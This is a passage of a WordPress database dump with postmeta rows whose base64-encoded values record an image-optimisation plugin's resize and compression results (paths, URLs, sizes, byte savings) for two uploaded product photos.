INSERT INTO `wp_postmeta` VALUES (29291, 1731, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NjA1MywiaWQiOiIxNzMxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjk1NiwidGltZSI6MTQ4MzU2NjA1NiwiaWQiOjE3MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyOTg5LCJ0aW1lIjoxNDgzNTY2MDYwLCJpZCI6MTczMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI3MDYsInRpbWUiOjE0ODM1NjYwNjMsImlkIjoxNzMxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMjE1NiwidGltZSI6MTQ4MzU2NjA2NywiaWQiOjE3MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MTMsInRpbWUiOjE0ODM1NjYwNzAsImlkIjoxNzMxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTM2LCJ0aW1lIjoxNDgzNTY2MDc0LCJpZCI6MTczMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU4MSwidGltZSI6MTQ4MzU2NjA3NywiaWQiOjE3MzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxOTAwLCJ0aW1lIjoxNDgzNTY2MDgxLCJpZCI6MTczMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDA2LCJ0aW1lIjoxNDgzNTY2MDg0LCJpZCI6MTczMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTg5LCJ0aW1lIjoxNDgzNTY2MDg3LCJpZCI6MTczMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6Njg5LCJ0aW1lIjoxNDgzNTY2MDkxLCJpZCI6MTczMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9WeWRheC1OUlQtOTYwLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTc3LCJ0aW1lIjoxNDgzNTY2MDk0LCJpZCI6MTczMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1Z5ZGF4LU5SVC05NjAtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVnlkYXgtTlJULTk2MC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM5MCwidGltZSI6MTQ4MzU2NjA5NywiaWQiOjE3MzF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29292, 1730, 'wpfc_optimisation_reduction', '8155'); 
INSERT INTO `wp_postmeta` VALUES (29293, 1730, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjYxMDIsImlkIjoiMTczMCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo0NjksInRpbWUiOjE0ODM1NjYxMDYsImlkIjoxNzMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6NjE4LCJ0aW1lIjoxNDgzNTY2MTA5LCJpZCI6MTczMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wZW5ldHJhdGluZy1vaWwtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wZW5ldHJhdGluZy1vaWwtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wZW5ldHJhdGluZy1vaWwtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjYwNCwidGltZSI6MTQ4MzU2NjExNCwiaWQiOjE3MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjIxNTEsInRpbWUiOjE0ODM1NjYxMTgsImlkIjoxNzMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTEyLCJ0aW1lIjoxNDgzNTY2MTIyLCJpZCI6MTczMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wZW5ldHJhdGluZy1vaWwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wZW5ldHJhdGluZy1vaWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wZW5ldHJhdGluZy1vaWwtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQwMiwidGltZSI6MTQ4MzU2NjEyNSwiaWQiOjE3MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGVuZXRyYXRpbmctb2lsLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0MDYsInRpbWUiOjE0ODM1NjYxMjgsImlkIjoxNzMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NTQxLCJ0aW1lIjoxNDgzNTY2MTMyLCJpZCI6MTczMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDI0LCJ0aW1lIjoxNDgzNTY2MTM1LCJpZCI6MTczMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NDk5LCJ0aW1lIjoxNDgzNTY2MTM5LCJpZCI6MTczMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NDg3LCJ0aW1lIjoxNDgzNTY2MTQyLCJpZCI6MTczMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjE5LCJ0aW1lIjoxNDgzNTY2MTQ2LCJpZCI6MTczMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BlbmV0cmF0aW5nLW9pbC05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wZW5ldHJhdGluZy1vaWwtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdW